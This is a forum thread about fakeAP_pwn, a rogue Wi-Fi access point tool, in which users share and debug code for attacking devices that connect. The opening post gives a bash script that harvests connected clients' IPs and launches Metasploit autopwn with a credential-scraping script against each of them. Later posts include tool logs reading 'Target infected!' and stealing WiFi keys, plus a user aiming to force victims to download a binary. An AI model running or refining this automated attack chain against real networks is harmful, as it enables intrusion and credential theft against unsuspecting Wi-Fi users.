[Script] [Video] fakeAP_pwn (v0.3)

[Scamentology]

Im not a huge fan of autopwn but many like it because its like shooting a machine gun. I'm trying to add a feature to the script to add a remote exploit like spoolss so when it finds a connection it automatically tries the exploit against the attached client. Here is what I have so far.

Code:

#!/bin/bash
echo "#!/bin/bash" >> /tmp/msf.sh
echo "/pentest/exploits/framework3/msfconsole -r /tmp/own.rc" >> /tmp/msf.sh
chmod 777 /tmp/msf.sh
/etc/init.d/postgresql-8.3 start
sleep 5
for (( ; ; ))
do
   arp | grep "at0" | awk '{print $1}' >> /tmp/iplist.lst
   iplist="$(cat /tmp/iplist.lst | awk -v line=1 'NR == line { print $0 }')"
   if [ "$iplist" != "" ] ; then
      echo "db_create /tmp/mynet.db" >> /tmp/own.rc
      echo "db_nmap -sS -F -n $iplist -T3" >> /tmp/own.rc
      echo "setg AutoRunScript scraper" >> /tmp/own.rc
      echo "db_autopwn -t -e -p -r" >> /tmp/own.rc
      xterm -hold -geometry 75x10+10+100 -T "fakeAP_pwn" -e "/tmp/msf.sh" &
      echo "exploiting $iplist"
      ipall="$iplist"
      rm -f /tmp/iplist.lst
      break;
   else
      sleep 10
      echo "Checking..."
   fi
done
sleep 20
#rm -f /tmp/msf.sh
#rm -f /tmp/own.rc
#rm -f /tmp/iplist.lst

I want to loop this so it adds addresses automatically then tries the exploit then ignores the mac once it has a terminal. any suggestions to improve this? I wrote this around of HD Moores ownitall.rc file.
It works against one target so far.

[g0tmi1k]

WITHOUT testing....Doing a once over on the code, it looks like it doesn't keep a record of which IP's its tested (ipall has it a value, but its not used?)
Would you also need to loop it for each value of iplist?

Code:

for target in ${iplist[@]}" ; do
   echo "Attacking $target"
done

I've had a few ideas on how to do this however, I'm away from my lab for the next few weeks - so I'm unable to test anything. )=
Once fakeAP_pwn v0.4 is out - its main update features should be multiple client support - so it wouldn't be too hard to mod it for your needs

[Scamentology]

WITHOUT testing....Doing a once over on the code, it looks like it doesn't keep a record of which IP's its tested (ipall has it a value, but its not used?)
Would you also need to loop it for each value of iplist?

I would like it to grab the first ip then attack it then move on to the next but ignore them if they came back up in the list. I dont want to attack the same machine over and over with the same exploit.
ipall was supposed to be for the next part of the script but with your suggestion is not necessary. Thanks for the tip.

Code:

for target in ${iplist[@]}" ; do
   echo "Attacking $target"
done

Ahhhh. thanks. thats what I was trying to do. 3 or 4 weeks ago I had never looked inside a script of any sort. so its a learning process. I spent all night reading about looping.

I've had a few ideas on how to do this however, I'm away from my lab for the next few weeks - so I'm unable to test anything. )=
Once fakeAP_pwn v0.4 is out - its main update features should be multiple client support - so it wouldn't be too hard to mod it for your needs

Cant wait!!

[Liuser]

Script works great - I noticed that you want to incorporate support for OSX in the future. Have you been able to connect to the fake AP using OSX and have the DHCP issue an IP? It is the problem that I am experiencing right now (Windows get IP just fine from DHCP, but OSX does not). I just wanted to verify that this was the main problem you are having right now as I am trying to solve it. Thanks!

[joker5bb]

if you are going to run this script in ubuntu make sure to install the xtightvncviewer package
a detailed wiki page is soon to come

[g0tmi1k]

Script works great - I noticed that you want to incorporate support for OSX in the future. Have you been able to connect to the fake AP using OSX and have the DHCP issue an IP? It is the problem that I am experiencing right now (Windows get IP just fine from DHCP, but OSX does not). I just wanted to verify that this was the main problem you are having right now as I am trying to solve it. Thanks!

Yes yes yes! It's been coded into it since v0.1 I hope to start work on Linux/OSX support for v0.5/v0.6

I don't have OSX at the mo, so I'm unable to test it out. Funny that windows works, were as OSX doesn't.
*/me wonders what OSX needs that Windows doesn't*
Can OSX connect to the AP? What happens on the AP and or DHCP window? Are you able to send the log file?

if you are going to run this script in ubuntu make sure to install the xtightvncviewer package
a detailed wiki page is soon to come

Thanks for pointing that out about VNC. Just a few things though, doesn't the script not automatically detect/install it? Does it not come out-of-the-box with ubuntu 10.10?

[pentest09]

Hi all I wonder if you can help me?

im running the latest Fakeap 0.3 and all works well but i get the following error when it tries to open the wkv keys this never happened before with earlier versions:

Keep up the great work tho g0tmilk, the internet reinstate works great too.

*] fakeAP_pwn v0.3 (#126)
[>] Analyzing: Environment
[>] Configuring: Environment
[>] Creating: Scripts
[>] Creating: Exploit (Windows)
[>] Creating: Access point
[>] Configuring: Network
[>] Starting: DHCP
[>] Starting: DNS
[>] Starting: Exploit
[>] Starting: Web server
[i] Waiting for the target to run the "update" file
[i] Target infected!
[>] Restoring: Internet access
[>] Opening: WiFi Keys
[!] action. Error code: 5 <------------------------------------------(error)
[>] Restoring: Environment[*] Done! (= Have you... g0tmi1k?
root@bt:~/FAP_0.3_126#

Kind Regards Dee

[cseven]

I had the same error code and it never created the /tmp/ folder where it places the wkv log file. When I ran the script with -d for diagnostics then the folder was created and the log file was there. I can't remember if the script still gave me the error coded though. Maybe give it a try with -d and see what happens.

[rick.m]

Hi

Congratulatios for the awesome tool. I have backtrack 4-Beta running on my VM (attacker system) and a victim laptop with Windows VISTA.

On the VM I have a alfa card (rtl8187) and I also used a edimax just to make sure it was not the problem, and its not, because I get the same behaivour with both.

On my VM I dont have internet access, just the fake AP, I dont want to allow internet access (since I dont have it), I just want to force clients to download our binary, thats all.

I have tested the default configuration and changed a bit, but the problem persist. It setup all stuff and I see client requests, clients associating, and I see MAC address being showed, but very fastly it changes to incomplete.

On the victim system it connects fine, get all the IP and the gateway with the ip of the attakcer computer (10.0.0.1), but I cant ping or access anything on the attacker computer. Strange enough, when I call arp -a on windows vista I dont see fake AP MAC and I only see network MAC with very strange numbers like a bunch o ff...

The machines are with state connected, but I cant ping or do anything, there is no connectivity, but I got the DHCP address correctly, etc.

This is very strange. I tested another laptop as victim and the same happens.

I called the script with -d and -v and I cant figure why. I posted a copy of the whole log here:

RAW OUTPUT fsdhjEjK

Ideas? Suggestions?

Also, why the WPATARGET that is the network that I want to gain access prob me constantly but never associate?

Because I have a different essid and bssid?

Or because the WPATARGET is protected by WAP and mine fake AP is not, and the client will just refuse it?

Or because my signal is weaker?

Thanks

[g0tmi1k]

Hi all I wonder if you can help me?

im running the latest Fakeap 0.3 and all works well but i get the following error when it tries to open the wkv keys this never happened before with earlier versions:

Keep up the great work tho g0tmilk, the internet reinstate works great too.

*] fakeAP_pwn v0.3 (#126)
[>] Analyzing: Environment
[>] Configuring: Environment
[>] Creating: Scripts
[>] Creating: Exploit (Windows)
[>] Creating: Access point
[>] Configuring: Network
[>] Starting: DHCP
[>] Starting: DNS
[>] Starting: Exploit
[>] Starting: Web server
[i] Waiting for the target to run the "update" file
[i] Target infected!
[>] Restoring: Internet access
[>] Opening: WiFi Keys
[!] action. Error code: 5 <------------------------------------------(error)
[>] Restoring: Environment[*] Done! (= Have you... g0tmi1k?
root@bt:~/FAP_0.3_126#

Kind Regards Dee

Thanks for reporting this - Ill push an update out later today. (=

I had the same error code and it never created the /tmp/ folder where it places the wkv log file. When I ran the script with -d for diagnostics then the folder was created and the log file was there. I can't remember if the script still gave me the error coded though. Maybe give it a try with -d and see what happens.

It now doesn't use /tmp anymore. It SHOULD now create a temp folder in the SAME path as fakeAP_pwn ./tmp/

Hi

Congratulatios for the awesome tool. I have backtrack 4-Beta running on my VM (attacker system) and a victim laptop with Windows VISTA.

On the VM I have a alfa card (rtl8187) and I also used a edimax just to make sure it was not the problem, and its not, because I get the same behaivour with both.

On my VM I dont have internet access, just the fake AP, I dont want to allow internet access (since I dont have it), I just want to force clients to download our binary, thats all.

I have tested the default configuration and changed a bit, but the problem persist. It setup all stuff and I see client requests, clients associating, and I see MAC address being showed, but very fastly it changes to incomplete.

On the victim system it connects fine, get all the IP and the gateway with the ip of the attakcer computer (10.0.0.1), but I cant ping or access anything on the attacker computer. Strange enough, when I call arp -a on windows vista I dont see fake AP MAC and I only see network MAC with very strange numbers like a bunch o ff...

The machines are with state connected, but I cant ping or do anything, there is no connectivity, but I got the DHCP address correctly, etc.

This is very strange. I tested another laptop as victim and the same happens.

I called the script with -d and -v and I cant figure why. I posted a copy of the whole log here:

RAW OUTPUT fsdhjEjK

Ideas? Suggestions?

Also, why the WPATARGET that is the network that I want to gain access prob me constantly but never associate?

Because I have a different essid and bssid?

Or because the WPATARGET is protected by WAP and mine fake AP is not, and the client will just refuse it?

Or because my signal is weaker?

Thanks

Okay, try setting the mode to "non", as you don't want to allow an Internet connection after becoming infected.
Alot of clients are trying to connect/probing... That might an issue.
Your also using VM as well as airbase-ng. Both of theses have issues.

I'm guessing the "arp -a on windows" issue is because of airbase-ng. Not 100% sure mind you.
Does the target have a gateway IP? DNS?

I don't understand what you're saying about about "WPATARGET".
The fakeAP you created was called "Free-WiFi", "WPATARGET" is scanning for networks (hence its probing). [So yes, the ESSID are different?]
The fakeAP you create is "Open", I have no idea if "WPATARGET" is protected.